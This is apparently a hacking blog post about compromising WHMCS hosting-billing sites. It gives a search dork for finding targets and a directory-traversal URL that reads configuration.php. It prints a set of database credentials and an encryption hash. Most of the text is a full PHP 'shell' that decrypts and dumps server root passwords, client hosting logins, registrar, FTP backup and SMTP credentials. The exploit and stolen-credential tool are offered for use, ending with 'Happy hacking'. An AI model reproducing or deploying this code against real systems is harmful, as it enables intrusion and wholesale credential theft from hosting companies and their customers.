WHMCS হ্যাকিং

WHMCS হ্যাকিং

13:21
Dork :

intext:"Powered by WHMCompleteSolution"

example :
http://www.example.com/clients/index.php



expolits url :

cart.php?a=test&templatefile=../../../configuration.php

*database info dekhar jonno

https://www.example.com/clients/cart.php?a=test&templatefile=..%2F..%2F..%2Fconfiguration.php

{ full url load=unhackable /// exploit url removed=done(vulnerable ;) ) }

CTRL+U

CTRL+P

$license

/////////////////////////////// DB Info ////////////////////////////////

$license = "Leased-7e82db0556c145de46c4";
$db_host = "localhost";
$db_username = "hmc_whmcs";
$db_password = "gqrFiO5_3&[[";
$db_name = "hmc_whmcs";
$cc_encryption_hash = "ysWaCWB1aDMlgodExRyVtx8Coc9xDpg1H32aPt1QXE13T5xhMW26k0yz2yWvN2nl";
$templates_compiledir = "templates_c/";

////////////////////////////////////////////////////////////////////////////
whmc shell

xtream.php

///// Code /////

<?
/*
*  whmcs Mangement
*  Add clients roots & client account
*/

ob_start();
$login = ($_COOKIE['login'] == "ok") ? true:false;
?>
<html>
<head>
<title>whmcs Mangement</title>
<style>
*{
    font-family: tahoma;
    font-size: 12px;
}
#index{
    margin: 0 150;
}
#header{
    padding: 50px;
    border:1px solid #000;
}
#navbar{
    border-left:1px solid #000;
    border-right:1px solid #000;
    border-bottom:1px solid #000;
    background:#000;
}
#navbar ul{

    list-style-type:  none;
    margin:0;
    padding: 0;
    overflow: hidden;
}
#navbar ul li{
    float:left;
}
#navbar ul li a{
  display: block ;
  text-decoration: none;
  padding: 10px;
  color:#fff;
}
#navbar ul li a:hover{
    background: #fff;
    color:  #000;
}

#content{
    padding: 10px;
    border-left:1px solid #000;
    border-right:1px solid #000;
    text-align: center;
}
#footer{
    text-align: center;
    padding: 4px;
    border:1px solid #000;
}

</style>
</head>
<body>
<div id="index">
<div id="header"><a href="?">whmcs Mangement</a></div>
<div id="navbar">
<ul>
<li><a href="?">Home</a></li>
<li><a href="?dp">Decode Pass</a></li>
<?
if($login){
    echo '
    <li><a href="?hostr00ts">Host r00ts</a></li>
    <li><a href="?Clientsr00ts">Clients r00ts</a></li>
    <li><a href="?Clientsinfos">Clients infos</a></li>
    <li><a href="?domains">Domains</a></li>
    <li><a href="?backup">Backup Infos</a></li>
    <li><a href="?smtp">SMTP Infos</a></li>
    <li><a href="?logout">Logout</a></li>
    ';
}

?>

</ul>
</div>

<div id="content">



<?

if(isset($_GET['dp'])){

    if($_POST[pass] & $_POST[hash]){
         echo "Decode Pass : <b>".decrypt($_POST[pass], $_POST[hash])."</b>";
    }
    echo "<form action='' method='POST'>
        <table border='0' cellpadding='5' align='center'>
        <tr><td>Pass</td><td><input type='text' name='pass' value='{$_POST[pass]}'/></td></tr>
        <tr><td>CC Encryption Hash</td><td><input type='text' name='hash' value='{$_POST[hash]}'/></td></tr>
        <tr><td colspan='2' align='center'><input type='submit' value='Decode'/></td></tr>
        </table>
        </form>";

}

if($_POST['ok'] == "Connect"){

    if(!$_POST['host'] or !$_POST['user'] or !$_POST['pass'] or !$_POST['db'] or !$_POST['hash']){
        echo "Error : Please Fill All inputs !";
    }else{

        if(@mysql_connect($_POST['host'],$_POST['user'],$_POST['pass']) && mysql_select_db($_POST['db'])){
        echo "Done : Connection Successfully
        <meta http-equiv='refresh' content='1;URL=?hostr00ts' />
        ";
        setcookie("host",$_POST['host']);
        setcookie("user",$_POST['user']);
        setcookie("pass",$_POST['pass']);
        setcookie("db",$_POST['db']);
        setcookie("hash",$_POST['hash']);
        setcookie("login","ok");
        ob_end_flush();
        }else{
            echo "Error : Check MySQL infos";
        }

    }
}

if(!$login && !$_GET){
    echo '<form action="" method="post">
          <table border="0" cellpadding="5" align="center">
          <tr><td>Host</td><td>: <input type="text" name="host" value="'.$_POST[host].'"></td></tr>
          <tr><td>user</td><td>: <input type="text" name="user" value="'.$_POST[user].'"></td></tr>
          <tr><td>pass</td><td>: <input type="text" name="pass" value="'.$_POST[pass].'"></td></tr>
          <tr><td>db</td><td>: <input type="text" name="db" value="'.$_POST[db].'"></td></tr>
          <tr><td>hash</td><td>: <input type="text" name="hash" value="'.$_POST[hash].'"></td></tr>
          <tr><td colspan="2" align="center"><input type="submit" value="Connect" name="ok"></td></tr>
          </table>
          </form>';
}elseif($login){

    mysql_connect($_COOKIE['host'] , $_COOKIE['user'] , $_COOKIE['pass']);
    mysql_select_db($_COOKIE['db']);
    $cc_encryption_hash = $_COOKIE['hash'];

    if(!$_GET){
            echo '<form action="" method="post">
          <table border="0" cellpadding="5" align="center">
          <tr><td>Host</td><td>: <input type="text" name="host" value="'.$_COOKIE[host].'"></td></tr>
          <tr><td>user</td><td>: <input type="text" name="user" value="'.$_COOKIE[user].'"></td></tr>
          <tr><td>pass</td><td>: <input type="text" name="pass" value="'.$_COOKIE[pass].'"></td></tr>
          <tr><td>db</td><td>: <input type="text" name="db" value="'.$_COOKIE[db].'"></td></tr>
          <tr><td>hash</td><td>: <input type="text" name="hash" value="'.$_COOKIE[hash].'"></td></tr>
          <tr><td colspan="2" align="center"><input type="submit" value="Connect" name="ok"></td></tr>
          </table>
          </form>';
    }elseif(isset($_GET['domains'])){

    $query = mysql_query("SELECT * FROM tblregistrars");

    echo "<table border='1' align='center' cellpadding='5'>
    <tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>";

    while($v = mysql_fetch_array($query)) {
    $value = (!decrypt($v['value'], $cc_encryption_hash)) ? "0":decrypt($v['value'], $cc_encryption_hash);
    echo "<tr><td>{$v['registrar']}</td><td>{$v['setting']}</td><td>$value</td></tr>" ;
    }

    echo "</table>";

    }elseif(isset($_GET['Clientsinfos'])){

    $query = mysql_query("SELECT * FROM tblhosting");
    echo "<table border='1' cellpadding='5' align='center'>
    <tr><td>domain</td><td>User</td><td>Pass</td><td>IP's</td></tr>";
    while($v = mysql_fetch_array($query)) {
    echo "<tr><td>{$v['domain']}</td><td>{$v['username']}</td><td>".decrypt ($v['password'], $cc_encryption_hash)."</td><td>{$v['assignedips']}</td></tr>";
    }
    echo "</table>";

    }elseif(isset($_GET['Clientsr00ts'])){

    $query = mysql_query("SELECT * FROM tblhosting where username = 'root'");
    echo "<table border='1' cellpadding='5' align='center'>
    <tr><td>domain</td><td>User</td><td>Pass</td><td>IP's</td></tr>";

    if(!is_array(mysql_fetch_array($query))){
        echo "<tr><td colspan='4' align='center'>Nothing Found !</td></tr>";
    }
    while($v = mysql_fetch_array($query)) {
    echo "<tr><td>{$v['domain']}</td><td>{$v['username']}</td><td>".decrypt ($v['password'], $cc_encryption_hash)."</td><td>{$v['assignedips']}</td></tr>";
    }
    echo "</table>";

    }elseif(isset($_GET['hostr00ts'])){
        $query = mysql_query("SELECT * FROM tblservers");

        echo "<table border='1' cellpadding='5' align='center'>
        <tr><td>Type</td><td>Active</td><td>IP Address</td><td>username</td><td>Password</td></tr>";

        while($v = mysql_fetch_array($query)) {

        echo "<tr>
        <td>{$v['type']}</td><td>{$v['active']}</td><td>{$v['ipaddress']}</td><td>{$v['username']}</td><td>".decrypt($v['password'], $cc_encryption_hash)."</td>
        </tr>";
        }
        echo "</table>";
    }elseif(isset($_GET['backup'])){

        $query = mysql_query("SELECT * FROM tblconfiguration where 1");

        echo "<table border='1' cellpadding='5' align='center'>";

        $wht = array('FTPBackupHostname','FTPBackupUsername','FTPBackupPassword','FTPBackupDestination');

            while($row = mysql_fetch_array($query)){

                  if($row[setting] == $wht[0]){
                        echo  "<tr><td>Hostname</td><td>{$row[value]}</td></tr>";  $wht[0] = xxx;
                  }elseif($row[setting] == $wht[1]){
                        echo  "<tr><td>Username</td><td>{$row[value]}</td></tr>";  $wht[1] = xxx;
                  }elseif($row[setting] == $wht[2]){
                        echo  "<tr><td>Password</td><td>{$row[value]}</td></tr>";  $wht[2] = xxx;
                  }elseif($row[setting] == $wht[3]){
                        echo  "<tr><td>Destination</td><td>{$row[value]}</td></tr>";  $wht[3] = xxx;
                  }
            }

        echo "</table>";

    }elseif(isset($_GET['smtp'])){

        $query = mysql_query("SELECT * FROM tblconfiguration where 1");

        echo "<table border='1' cellpadding='5' align='center'>";

            while($row = mysql_fetch_array($query)){

                  if($row[setting] == 'SMTPHost'){
                        echo  "<tr><td>Hostname</td><td>{$row[value]}</td></tr>";
                  }elseif($row[setting] == 'SMTPUsername'){
                        echo  "<tr><td>Username</td><td>{$row[value]}</td></tr>";
                  }elseif($row[setting] == 'SMTPPassword'){
                        echo  "<tr><td>Password</td><td>{$row[value]}</td></tr>";
                  }elseif($row[setting] == 'SMTPPort'){
                        echo  "<tr><td>Port</td><td>{$row[value]}</td></tr>";
                  }
            }

        echo "</table>";

    }elseif(isset($_GET['logout'])){
        foreach($_COOKIE as $name=>$value){ setcookie($name,0); }
        echo "Thanks For Using Me <meta http-equiv='refresh' content='1;URL=?' />";

    }

}

?>
</div>

<div id="footer">https://facebook.com/breakthes3c</div>
</div>
</body>
</html>
<?
    function decrypt ($string,$cc_encryption_hash)
{
    $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
    $hash_key = _hash ($key);
    $hash_length = strlen ($hash_key);
    $string = base64_decode ($string);
    $tmp_iv = substr ($string, 0, $hash_length);
    $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
    $iv = $out = '';
    $c = 0;
    while ($c < $hash_length)
    {
        $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
        ++$c;
    }

    $key = $iv;
    $c = 0;
    while ($c < strlen ($string))
    {
        if (($c != 0 AND $c % $hash_length == 0))
        {
            $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
        }

        $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
        ++$c;
    }

    return $out;
}


function _hash ($string)
{
    $hash = (function_exists ('sha1')) ? sha1($string):md5($string);
    $out = '';
    $c = 0;
    while ($c < strlen ($hash))
    {
        $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
        $c += 2;
    }
    return $out;
}
?>

////////////////////////////////////////////// code end ////////////////////////////////////////

site to find ip : http://www.selfseo.com/find_ip_address_of_a_website.php

find out the target site ip & replace with host.....

Happy hacking .... ;)

About

This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.

Next
« Prev Post
Previous
Next Post »
Thanks for your comment
Subscribe to: Post Comments (Atom)